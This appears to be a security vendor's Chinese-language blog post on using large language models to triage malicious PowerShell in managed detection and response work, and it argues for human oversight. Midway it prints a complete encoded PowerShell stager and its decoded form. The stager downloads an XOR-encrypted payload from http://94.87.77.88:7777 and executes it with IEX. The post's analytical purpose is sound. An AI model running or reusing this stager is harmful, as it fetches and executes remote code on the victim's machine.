NEITHNET 解決方案
NEITHNET 資安實驗室
在這個數位時代裡,大型語言模型(Large Language Models, LLM)的興起不僅重塑了我們與機器交流的方式,也為資安領域帶來了前所未有的機遇與挑戰。隨著數據量的爆炸性增長,特別是在網路安全領域,我們迫切需要更智慧、更高效的方法來處理和分析數據,這正是 LLM 顯示出其強大潛力的領域。
以MDR(Managed Detection and Response)來說,其管理面臨諸多挑戰,尤其在處理龐大日誌量時尤為明顯。警報的高噪聲水平和對細微行為差異的判斷需求,使一線的資安分析師承受巨大的時間和人力壓力,例如分辨PowerShell 或cmd.exe 的正當使用與惡意行為之間的界限,往往需要精確且細致的分析。我們可以從Gartner做的研究調查中,了解資安人員正在承受巨大且難以想像的工作壓力,Gartner 預測到 2025 之前有近半數的資安團隊管理者會離職,更有 1/4 的人會不再謀求相同職位[1]。
在這種背景下,引入 AI 來協助處理成為了一種趨勢。NEITHNET 先進資安實驗室以 PowerShell 為研究目標,搜集了以下幾種樣態的數據來進行分析測試與訓練 (如下表一),外部 AI 的應用在解析惡意指令和編碼時,可以有效篩選和處理資訊,但它同時也可能屏蔽掉一些關鍵的敏感資訊(如圖一)。另一方面,建立內部 AI 訓練模型雖然能更好地適應特定環境,但在資料量不足的情況下可能導致過度擬合 (Overfitting)的問題,從而影響模型的有效性和準確性(如圖二)。
有鑑於此,在累積足夠多樣化與數量的樣本之前,我們團隊在利用 LLM 處理這些數據時往往需要外部干預。這包括對各種編碼和解碼行為的人工審查(如圖三、圖四),確保 AI 的決策不僅基於大量數據,而且也融合了專業知識和實踐經驗。
以下是我們本次模擬測驗的指令「powershell.exe -Nop -sta -NonI -W Hidden -Enc JABXAEMAPQBOAGUAdwAtAE8AYgBqAEUAYwBUACAAUwB5AFMAVABlAE0ALgBOAEUAVA AuAFcAZQBiAEMAbABpAEUATgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANwAuAD AAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAI ABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQ BrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBDAC4ASABlAEEARABlAFIAUwAuAEEARABkACg AJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAVwBjAC4AUAByAG8Ae ABZACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAVAAuAFcARQBCAFIAZQBRAFUARQBzA HQAXQA6ADoARABFAEYAQQB1AEwAdABXAGUAYgBQAHIAbwBYAHkAOwAkAHcAYwAuAFA AUgBPAHgAWQAuAEMAcgBFAGQAZQBuAFQAaQBhAGwAUwAgAD0AIABbAFMAeQBzAFQA ZQBtAC4ATgBFAHQALgBDAFIAZQBkAGUATgBUAEkAQQBsAEMAQQBjAEgARQBdADoAOgBE AGUARgBBAFUATABUAE4AZQB0AFcATwByAEsAQwByAGUAZABFAE4AVABpAEEAbABzADsAJ ABLAD0AJwBJAE0ALQBTACYAZgBBADkAWAB1AHsAWwApAHwAdwBkAFcASgBoAEMAKwAh AE4AfgB2AHEAXwAxADIATAB0AHkAJwA7ACQAaQA9ADAAOwBbAEMASABhAFIAWwBdAF0 AJABCAD0AKABbAGMASABhAFIAWwBdAF0AKAAkAHcAYwAuAEQATwB3AE4ATABPAGEARA BTAHQAcgBpAE4AZwAoACIAaAB0AHQAcAA6AC8ALwA5ADQALgA4ADcALgA3ADcALgA4ADg AOgA3ADcANwA3AC8AaABvAG0AZQAuAGEAcwBwACIAKQApACkAfAAlAHsAJABfAC0AQgBY AG8AUgAkAEsAWwAkAEkAKwArACUAJABrAC4ATABFAG4ARwBUAEgAXQB9ADsASQBFAFgAI
AAoACQAQgAtAGoATwBJAG4AJwAnACkA」,解碼後如下$WC=New-ObjEcT SySTeM.NET.WebCliENt;$u=’Mozilla/7.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko’;$WC.HeADeRS.ADd(‘User-Agent’,$u);$Wc.ProxY = [System.NeT.WEBReQUEst]::DEFAuLtWebProXy;$wc.PROxY.CrEdenTialS = [SysTem.NEt.CRedeNTIAlCAcHE]::DeFAULTNetWOrKCredENTiAls;$K=’IM- S&fA9Xu{[)|wdWJhC+!N~vq_12Lty’;$i=0;[CHaR[]]$B=([cHaR[]]($wc.DOwNLOaDStriNg(“http://94.87.77.88:7777/home.asp”)))|%{$_-BXoR$K[$I++%$k.LEnGTH]};IEX ($B-jOIn”),大致行為為創建一個 System.Net.WebClient 實例,並從指定的 http://94.87.77.88:7777/home.asp 下載數據進行 XOR 解密。
在資安治理領域,AI 無疑提供了一個新的可能,但它是加速資安事件的處理?還是產生更多的噪聲造成資安人員沈重的負擔?目前 AI 的確還不能完全取代人類專家的分析和判斷,需要所有對資安與先進科技有熱情的研究員一起努力,NEITHNET 也持續在資安議題中嘗試新的應用科技結合,期望未來 AI 能成為應對安全威脅的有力工具。在實現威脅應變自動化的同時,我們必須警惕過分依賴 AI,忽視了其局限性所可能帶來的治理幻覺。隨著技術的進步和數據的累積,未來的 AI 有望在資安治理中發揮更大作用,但在當下,人機協作仍是最佳的策略。
註釋:
[1]Gartner Predicts Nearly Half of Cybersecurity Leaders Will Change Jobs by 2025 https://www.gartner.com/en/newsroom/press-releases/2023-02-22-gartner-predicts-nearly- half-of-cybersecurity-leaders-will-change-jobs-by-2025
更多資安訊息及防護策略,歡迎與NEITHNET資安專家聯繫:info@neithnet.com。